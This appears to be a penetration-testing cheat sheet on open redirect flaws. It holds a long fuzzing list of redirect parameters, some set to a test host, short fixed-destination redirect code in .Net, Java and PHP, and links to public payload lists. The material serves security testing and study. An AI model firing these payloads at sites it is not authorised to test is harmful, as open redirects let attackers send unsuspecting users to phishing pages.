?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io

Code examples

.Net

response.redirect("~/mysafe-subdomain/login.aspx")

Java

response.redirect("http://mysafedomain.com");

PHP

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>

Tools

Resources

In https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect you can find fuzzing lists. https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html https://github.com/cujanovic/Open-Redirect-Payloads